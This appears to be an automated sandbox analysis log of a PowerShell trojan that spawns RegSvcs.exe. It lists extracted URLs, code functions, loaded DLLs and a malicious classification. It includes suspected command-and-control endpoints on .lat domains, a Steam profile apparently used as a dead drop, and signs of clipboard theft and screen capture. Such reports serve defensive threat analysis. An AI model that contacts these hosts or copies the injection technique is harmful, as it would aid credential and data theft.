    Source: powershell.exe, 00000000.00000002.2184375332.000001B52E351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52CCD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000000.00000002.2183976241.000001B52C947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52CAB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
    Source: RegSvcs.exe, 00000004.00000002.2195309528.0000000001458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=I8QM230l1pb_&a
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: RegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://finickypwk.lat:443/api
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52CCD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52DC85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: RegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kickykiduz.lat:443/api
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52E351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
    Source: powershell.exe, 00000000.00000002.2184375332.000001B52E351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: RegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://savorraiykj.lat:443/apisq
    Source: RegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shoefeatthe.lat:443/api
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: RegSvcs.exe, 00000004.00000002.2196147151.00000000014A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/of
    Source: RegSvcs.exe, 00000004.00000002.2195684340.000000000145C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: RegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
    Source: RegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://washyceehsu.lat:443/api
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_004363E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_004363E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00436590 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,4_2_00436590
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B2F030_2_00007FFD348B2F03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B5E750_2_00007FFD348B5E75
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B3E650_2_00007FFD348B3E65
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B5E800_2_00007FFD348B5E80
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B40350_2_00007FFD348B4035
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B79190_2_00007FFD348B7919
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B3A4D0_2_00007FFD348B3A4D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B51650_2_00007FFD348B5165
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B61B90_2_00007FFD348B61B9
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B3BFD0_2_00007FFD348B3BFD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004087404_2_00408740
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00440A0D4_2_00440A0D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040AE604_2_0040AE60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004300504_2_00430050
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004110784_2_00411078
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004270D04_2_004270D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004361404_2_00436140
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043912C4_2_0043912C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004091C04_2_004091C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004161DF4_2_004161DF
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004311E64_2_004311E6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004321884_2_00432188
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004061904_2_00406190
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042F1954_2_0042F195
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004421B04_2_004421B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041E2504_2_0041E250
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B2004_2_0041B200
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004042D04_2_004042D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004082A04_2_004082A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004412B14_2_004412B1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C3704_2_0041C370
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004273A04_2_004273A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004204404_2_00420440
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004104464_2_00410446
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004174514_2_00417451
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004424604_2_00442460
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004194704_2_00419470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004074004_2_00407400
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043C4104_2_0043C410
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E4B04_2_0040E4B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A5744_2_0041A574
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004245C04_2_004245C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004165EE4_2_004165EE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004155904_2_00415590
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004095A04_2_004095A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004066204_2_00406620
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040D6904_2_0040D690
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004186904_2_00418690
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043974A4_2_0043974A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004197104_2_00419710
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041F7104_2_0041F710
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C7D04_2_0041C7D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004427E04_2_004427E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043B7B04_2_0043B7B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042A8104_2_0042A810
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004338104_2_00433810
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004058E04_2_004058E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042D8934_2_0042D893
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004148B04_2_004148B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004288BA4_2_004288BA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004159754_2_00415975
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040A9104_2_0040A910
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004419104_2_00441910
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004039204_2_00403920
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441A564_2_00441A56
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00427A504_2_00427A50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041BAD04_2_0041BAD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00433AD04_2_00433AD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00431A884_2_00431A88
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441A944_2_00441A94
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041AA904_2_0041AA90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00442A904_2_00442A90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041CAA04_2_0041CAA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043CAA74_2_0043CAA7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441B404_2_00441B40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00420B104_2_00420B10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402B204_2_00402B20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00411B204_2_00411B20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042ABC04_2_0042ABC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441BD04_2_00441BD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043AC404_2_0043AC40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441C604_2_00441C60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00404C004_2_00404C00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042ECD04_2_0042ECD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00439CD84_2_00439CD8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00440CD84_2_00440CD8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00414C9C4_2_00414C9C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042CCA04_2_0042CCA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00426D704_2_00426D70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00428D764_2_00428D76
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00422D174_2_00422D17
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00405DC04_2_00405DC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00442DE04_2_00442DE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00415E424_2_00415E42
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00423E444_2_00423E44
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00413E504_2_00413E50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041BE004_2_0041BE00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042DEE54_2_0042DEE5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402EF04_2_00402EF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043EE804_2_0043EE80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043AEA04_2_0043AEA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00427F8D4_2_00427F8D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00413E40 appears 128 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00407F90 appears 52 times
    Source: classification engineClassification label: mal96.troj.evad.winPS1@6/5@10/1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00430050 CoCreateInstance,4_2_00430050
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4000:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzjj0mp0.bvc.ps1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
